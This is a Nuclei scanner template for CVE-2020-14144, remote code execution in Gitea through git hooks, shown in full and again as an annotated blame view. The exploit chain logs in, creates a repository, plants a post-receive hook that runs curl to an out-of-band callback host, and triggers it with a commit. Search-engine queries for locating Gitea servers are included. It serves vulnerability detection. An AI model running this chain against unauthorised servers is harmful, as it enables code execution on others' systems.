nuclei-templates/http/cves/2020/CVE-2020-14144.yaml

id: CVE-2020-14144

info:
  name: Gitea 1.1.0 - 1.12.5 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides."
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: Fixed in version 1.16.7.
  reference:
    - https://dl.gitea.io/gitea/1.16.6
    - https://github.com/go-gitea/gitea/pull/13058
    - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14144
    - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2020-14144
    cwe-id: CWE-78
    epss-score: 0.97279
    epss-percentile: 0.9986
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: gitea
    product: gitea
    shodan-query:
      - html:"Powered by Gitea Version"
      - http.html:"powered by gitea version"
      - http.title:"gitea"
      - cpe:"cpe:2.3:a:gitea:gitea"
    fofa-query:
      - body="powered by gitea version"
      - title="gitea"
    google-query: intitle:"gitea"
  tags: cve2020,cve,rce,gitea,authenticated,git,intrusive

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
      - |
        GET /repo/create HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /repo/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master
      - |
        POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
      - |
        GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: body_1
        words:
          - "Gitea:"

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - name="_csrf" value="(.*)"
        internal: true

      - type: regex
        name: auth_csrf
        group: 1
        regex:
          - name="_csrf" content="(.*)"
        internal: true

      - type: regex
        name: last_commit
        group: 1
        regex:
          - name="last_commit" value="(.*)"
        internal: true
# digest: 490a004630440220427ad9ce74b9b98b86407001fb43a5da7b733d081f770b10414a15c7de311cdd0220775ec548b3300873c5d4fc8f2c4a0bb13bc20bfb7c68eb96a6151b2db81cd576:922c64590222798bb761d5b6d8e72950
templates added 2023-03-18 22:07:09 +00:00			`id: CVE-2020-14144`

			`info:`
Enhancement: cves/2020/CVE-2020-14144.yaml by md 2023-03-28 18:46:50 +00:00			`name: Gitea 1.1.0 - 1.12.5 - Remote Code Execution`
templates added 2023-03-18 22:07:09 +00:00			`author: theamanrawat`
			`severity: high`
			`description: \|`
Enhancement: cves/2020/CVE-2020-14144.yaml by md 2023-03-28 18:46:50 +00:00			Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides."
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: Fixed in version 1.16.7.`
templates added 2023-03-18 22:07:09 +00:00			`reference:`
			`- https://dl.gitea.io/gitea/1.16.6`
Auto Generated CVE annotations [Mon Mar 20 07:05:15 UTC 2023] :robot: 2023-03-20 07:05:15 +00:00			`- https://github.com/go-gitea/gitea/pull/13058`
			`- https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/`
Enhancement: cves/2020/CVE-2020-14144.yaml by md 2023-03-28 18:46:50 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-14144`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script`
templates added 2023-03-18 22:07:09 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 7.2`
			`cve-id: CVE-2020-14144`
			`cwe-id: CWE-78`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.97279`
			`epss-percentile: 0.9986`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`cpe: cpe:2.3:a:gitea:gitea::::::::`
templates added 2023-03-18 22:07:09 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`max-request: 7`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: gitea`
			`product: gitea`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- html:"Powered by Gitea Version"`
			`- http.html:"powered by gitea version"`
			`- http.title:"gitea"`
			`- cpe:"cpe:2.3:a:gitea:gitea"`
			`fofa-query:`
			`- body="powered by gitea version"`
			`- title="gitea"`
product/queries updated 2024-05-31 19:23:20 +00:00			`google-query: intitle:"gitea"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2020,cve,rce,gitea,authenticated,git,intrusive`
templates added 2023-03-18 22:07:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
templates added 2023-03-18 22:07:09 +00:00			`- raw:`
			`- \|`
			`GET /user/login HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /user/login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}`
			`- \|`
			`GET /repo/create HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /repo/create HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master`
			`- \|`
			`POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}`
			`- \|`
			`GET /{{username}}/{{randstr}}/_new/master HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /{{username}}/{{randstr}}/_new/master HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- http`
templates added 2023-03-18 22:07:09 +00:00
			`- type: word`
			`part: body_1`
			`words:`
			`- "Gitea:"`

			`extractors:`
			`- type: regex`
			`name: csrf`
			`group: 1`
			`regex:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- name="_csrf" value="(.*)"`
templates added 2023-03-18 22:07:09 +00:00			`internal: true`

			`- type: regex`
			`name: auth_csrf`
			`group: 1`
			`regex:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- name="_csrf" content="(.*)"`
templates added 2023-03-18 22:07:09 +00:00			`internal: true`

			`- type: regex`
			`name: last_commit`
			`group: 1`
			`regex:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- name="last_commit" value="(.*)"`
templates added 2023-03-18 22:07:09 +00:00			`internal: true`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 490a004630440220427ad9ce74b9b98b86407001fb43a5da7b733d081f770b10414a15c7de311cdd0220775ec548b3300873c5d4fc8f2c4a0bb13bc20bfb7c68eb96a6151b2db81cd576:922c64590222798bb761d5b6d8e72950`